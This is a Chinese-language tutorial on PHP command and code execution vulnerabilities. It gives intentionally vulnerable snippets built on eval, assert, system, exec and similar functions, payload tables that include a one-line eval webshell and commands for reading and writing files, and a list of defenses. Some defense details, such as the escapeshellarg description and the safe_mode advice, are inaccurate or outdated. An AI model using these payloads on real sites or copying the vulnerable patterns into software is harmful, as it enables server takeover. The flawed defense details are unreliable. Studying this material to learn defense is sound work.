基本定义
命令执行漏洞是指攻击者可以随意执行系统命令,分为远程代码执行和系统命令执行两类。
原理
程序应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命
令拼接到正常命令中,从而造成命令执行攻击。
两个条件
- 用户能够控制的函数输入
- 存在可以执行代码或者系统命令的危险函数
命令执行漏洞产生的原因
- 由于开发人员编写源码时,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句,并提交服务端执行
- 命令注入攻击中, Web服务器没有过滤类似system、eval和exec等函数,是该漏洞攻击成功的主要原因。
命令执行漏洞带来的危害
- 继承Web服务程序的权限去执行系统命令(任意代码)或读写文件
- 反弹shell
- 控制整个网站甚至控制服务器
- 进一步内网渗透
管道符号
Linux
- ;前面的执行完执行后面的
- |是管道符,显示后面的执行结果
- ||当前面的执行出错时执行后面的
Windows
- &前面的语句为假则直接执行后面的
- &&前面的语句为假则直接出错,后面的也不执行
- |直接执行后面的语句
- ||前面出错执行后面的
通用命令符
- command1 && command2 command1执行成功才执行command2
- command1 | command2 只执行command2
- command1 & command2 command1和command2之间互相不影响
命令执行常见场景
- Ping主机
- DNS请求
- Office文档
- 框架缺陷
远程代码执行
远程代码执行的函数
- eval()
<?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?>
- assert()
<?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ echo "Please input a"; } ?>
- preg_replace()
<?php if(isset($_GET['a'])){ //Preg_replace("/\[(.*)\]/e",'\\1',$_GET['a']); Preg_replace("/(.*)/e",'\\1',$_GET['a']); } else{ echo "Please input a"; } ?>
- call_user_func()
<?php if(isset($_GET['a'])){ call_user_func($_GET['a'],$_GET['b']); } else{ echo "Please input a"; } ?>
- $a($b)
<?php if(isset($_GET['a'])&isset($_GET['b'])){ @$a = $_GET['a']; @$b = $_GET['b']; @$a($b);//函数,可变函数 //$a就是函数的名 //$b就是函数的值 //?a=assert&b=phpinfo() //assert(phpinfo()); }else{ echo "Please input a&b"; } ?>
如果页面中存在这些函数并且对于用户的输入没有做严格的过滤,那么就可能造成远程命令执行漏洞
远程代码执行漏洞的利用payload
payload | 作用 |
---|---|
?a=@eval($_POST[666]); | 一句话木马 |
?a=print(__FILE__); | 获取当前绝对路径 |
?a=var_dump(file_get_contents('c:\windows\system32\drivers\etc\hosts')); | 读取文件 |
?a=var_dump(file_put_contents($_POST[1],$_POST[2])); 1=shell.php&2=<?php phpinfo()?> | 写shell |
系统命令执行的函数
- system()
<?php if(isset($_GET['a'])){ system($_GET['a']); } else{ echo "Please input a"; } ?>
- exec()
<?php if(isset($_GET['a'])){ echo exec($_GET['a']); } else{ echo "Please input a"; } ?>
- shell_exec()
<?php if(isset($_GET['a'])){ echo shell_exec($_GET['a']); } else{ echo "Please input a"; } ?>
- passthru()
<?php if(isset($_GET['a'])){ passthru($_GET['a']); } else{ echo "Please input a"; } ?>
- popen()
<?php if(isset($_GET['a'])){ popen("whoami >> 1.txt",'r'); }else{ echo "Please input a"; } ?>
- 反引号
<?php if(isset($_GET['a'])){ echo `whoami`; }else{ echo "Please input a"; } ?>
系统命令执行漏洞payload
payload | 作用 |
---|---|
?a=type c:\windows\system32\drivers\etc\hosts | 查看文件 |
?a=cd | 查看当前绝对路径 |
?a=echo "<?php phpinfo();?>" > E:\xampp\htdocs\php\os\phpinfo.php | 写shell |
命令执行漏洞防御方案
(1)尽量不要执行外部命令
(2)使用自定义函数或函数库来替代外部命令的功能
(3)使用escapeshellarg函数来处理命令参数
escapeshellarg函数会将任何引起参数或命令结束的字符转义,单引号 ' 、替换成 \ 双引号 “ 、替换成 \" 、分号 ;、替换成 \;
(4)使用safe_mode_exec_dir指定要执行程序的主目录(php.ini)
用safe_mode_exec_dir指定要执行程序的主目录,可以把会使用的命令提前放入此路径内
safe_mode = On (打开php的安全模式)
safe_mode_exec_dir = /usr/local/php/bin/